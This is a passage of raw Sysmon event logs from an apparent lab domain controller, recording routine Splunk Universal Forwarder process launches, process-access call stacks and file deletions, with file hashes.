Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=421D046D909B06F22719F516175E56C9,SHA256=129DD2ED7422FB9307D3E5E3AAEF7B57977141AD908F0D4275651A504726543B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201584Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7B6-6040-074E-00000000AD01}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201583Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201582Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201581Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201580Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201579Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E7B6-6040-074E-00000000AD01}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201578Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.762{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7B6-6040-074E-00000000AD01}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201577Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.763{5ABCFE62-E7B6-6040-074E-00000000AD01}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201576Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.590{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=779F17AA2DEEC579A94A9EA75C3E23E2,SHA256=9C84840DF8EC30E4A42B70056EFB67D7C811BB0B6211CF3AA068B897F35B2EA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201575Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.262{5ABCFE62-E7B6-6040-064E-00000000AD01}58042764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201574Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7B6-6040-064E-00000000AD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201573Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201572Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201571Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201570Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201569Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E7B6-6040-064E-00000000AD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201568Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.137{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7B6-6040-064E-00000000AD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201567Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:18.138{5ABCFE62-E7B6-6040-064E-00000000AD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201597Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.887{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=497CAB1334C9768D7B82A79C13C4EA26,SHA256=A223ACAA106BAC3AA789799E9814BE7076A5A8EA36294E2D47EB46F1B5717908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201596Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.778{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82E2735F1F76A6357D41CCC8C56F2B38,SHA256=E0DC4EAD815DB74B2A168A285FD820D288CF2F52C59BFACB44D0BE910E897BD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201595Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.559{5ABCFE62-E7B7-6040-084E-00000000AD01}50646044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201594Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E7B7-6040-084E-00000000AD01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201593Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201592Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201591Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201590Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201589Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E7B7-6040-084E-00000000AD01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201588Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.434{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E7B7-6040-084E-00000000AD01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201587Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:19.435{5ABCFE62-E7B7-6040-084E-00000000AD01}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201598Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:20.903{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D96DE0EEB4C74A04E64006F469FA7DBE,SHA256=4E44B56F917B04F0E6D4B10D4FC163F70365D21EFB1323D6A6DEC6FB96DA6E3E,IMPHASH=00000000000000000000000000000000falsetrue 